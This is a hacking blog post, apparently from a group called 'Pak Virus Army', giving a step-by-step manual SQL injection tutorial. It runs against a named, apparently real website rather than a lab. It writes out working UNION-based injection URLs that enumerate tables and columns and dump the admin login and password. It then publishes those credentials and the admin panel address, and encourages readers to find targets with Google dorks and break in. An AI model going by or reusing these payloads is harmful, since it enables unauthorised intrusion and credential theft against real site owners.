Home » SQL Injection » How To Manual Sql Injection - Step by Step How To Manual Sql Injection - Step by Step Pak Virus Army 12:37 SQL Injection How To Manual Sql Injection-Step By Step First we need to find a website which is vulnerable to Sql inejection attacks .. Use google dorks for finding a web :) ok so lets start .. :) I found a Vulnerable site :) here it is , txi.co.in/article.php?id=2 By adding ' in the end we check if the site is vulnerable or not like this txi.co.in/article.php?id=2' you can see Error in the middle .. ok so , lets found its columns.. :) for finding columns we use .. order by "num"--+ LIKE THIS : order by 1--+ (increase the number until we get an error ) http://txi.co.in/article.php?id=2' order by 1--+ (NO ERROR) http://txi.co.in/article.php?id=2' order by 2--+ (NO ERROR) http://txi.co.in/article.php?id=2' order by 3--+ (NO ERROR) http://txi.co.in/article.php?id=2' order by 4--+ (NO ERROR) http://txi.co.in/article.php?id=2' order by 5--+ (ERROR) We are getting An error on order by 5--+ that means the site has only 4 columns ,, Now , lets find Valid String ... for finding valid string we use http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+ (we select 4 columns because the website has 4 columns) and we use ""and 0 "" for falsing the query After that a num will show on the screen ... Like here 2 and 3 showing .. means 2 and 3 are the vulnerable columns .. now replace 2 with "" group_concat(table_name) "" And in the end .. write "" from information_Schema.tables where table_schema=database() "" Like this .. http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+ here ,we got all tables in the current database :) :) we need admin username and password for login .. it should be in admin table.. Note :: admin tables are named differently sometimes ... like (users , adminlogin , user_login , etc etc ) here we have the admin table named "" admin "" Now For Getting Columns Of Tables We use ... group_concat(column_name) Replace with (table_name) and in the end write.. " from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+ " Like This .. http://txi.co.in/article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+ Hex Of Admin Is .. 0x61646d696e (you will learn that) :) now we got the username and password column.. To Dump the Data From columns We Use : group_concat(login,0x3a,password) Replace with (column_name) and in the end write from admin--+ Like This : http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4%20from admin--+ Here We Got The Username And Password ;) ;) Username : admin Password : hitesh123 Now Login Into Admin Panel :D :D And Do What You Want :P :P Admin Panel : http://www.txi.co.in/admin/login.php Regards , -tr0jAn* hAx0R * -----------------------------END--------------------------------------------------- Share: Facebook Twitter Google+ StumbleUpon Digg Delicious LinkedIn Reddit Technorati
0 comments:
Post a Comment